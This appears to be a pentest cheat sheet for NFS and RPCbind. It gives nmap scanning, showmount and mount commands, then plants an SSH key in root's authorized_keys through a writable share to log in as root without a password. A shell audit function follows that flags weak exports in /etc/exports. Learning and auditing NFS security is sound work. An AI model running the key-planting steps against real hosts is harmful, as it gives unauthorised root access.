Nmap Scan on RPCbind and NFS

nmap -v -p 111 10.11.1.1-254

nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254

nmap -p 111 --script nfs* 10.11.1.72

Identifying if NFS is in use

rpcinfo -p 10.10.10.3

# If both 111 (rpcbind) and 2049 (nfs) are listed, NFS shares are enabled and we can try to mount them

Show all mounts

showmount -e 10.10.10.3

Mount a NFS share

mkdir /mnt/nfs
mount -t nfs $ip:/share /mnt/nfs

Unmounting the shares

umount -f -l /mnt/nfs
# -f – Force unmount (in case of an unreachable NFS server).
# -l – Lazy unmount. Detach the filesystem from the filesystem hierarchy now, and clean up all references to the filesystem as soon as it is not busy anymore.

Further Exploitation

If you can write to the remote host's share, try putting an SSH key there so that we can get remote SSH access without a password.

ssh-keygen
# Generate an SSH key pair (defaults to ~/.ssh/id_rsa and ~/.ssh/id_rsa.pub)

cat ~/.ssh/id_rsa.pub >> /mnt/nfs/root/.ssh/authorized_keys
# Append the public key to root's authorized_keys via the mounted share

ssh root@$ip
# Now we can log in to the target without a password
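The key-planting step above only succeeds when the export lets a remote client write as root, so the defender's check is the server's exports file. As an added example that is not part of the original notes, this POSIX shell function audits exports syntax for exports that are open to every host, writable, or set no_root_squash; the sample exports file and the reason labels are constructed here.

```shell
#!/bin/sh
# Added example (not from the original notes): audit NFS export definitions for
# the options that make the write-and-plant-a-key trick possible.
# A finding is raised for exports open to every host ("*" or no host given),
# exports that are rw, and exports with no_root_squash (remote root keeps uid 0
# on the share, so it can write root-owned files such as root's authorized_keys).
# The exports text below is constructed; a real audit would feed /etc/exports.

SAMPLE_EXPORTS='# constructed /etc/exports
/share        *(rw,sync,no_root_squash)
/home         10.10.10.0/24(rw,sync,root_squash)
/pub          10.10.10.5(ro,sync)
/backup       *(ro)'

# audit_exports: reads exports syntax on stdin and prints one line per weak
# export:  <path> <host> <reason>[,<reason>...]
# Runs in a subshell so "set -f" (no globbing of a literal "*") stays local.
audit_exports() (
    set -f
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' |
    while read -r path rest; do
        for entry in $rest; do
            case $entry in
                *\(*\)) host=${entry%%\(*}; opts=${entry#*\(}; opts=${opts%\)} ;;
                *)      host=$entry; opts='' ;;          # no option list at all
            esac
            if [ -z "$host" ]; then host='*'; fi         # "(rw)" alone means everyone
            reasons=''
            if [ "$host" = '*' ]; then reasons="${reasons}world-exported,"; fi
            case ",$opts," in *,rw,*) reasons="${reasons}rw,";; esac
            case ",$opts," in *,no_root_squash,*) reasons="${reasons}no_root_squash,";; esac
            if [ -n "$reasons" ]; then
                printf '%s %s %s\n' "$path" "$host" "${reasons%,}"
            fi
        done
    done
)

# Usage: run against the constructed sample, or against the live file with
#   audit_exports < /etc/exports
printf '%s\n' "$SAMPLE_EXPORTS" | audit_exports
```

On the sample, /share is reported with all three reasons, /home only as rw, /backup as world-exported, and /pub (read-only to a single host) is not reported.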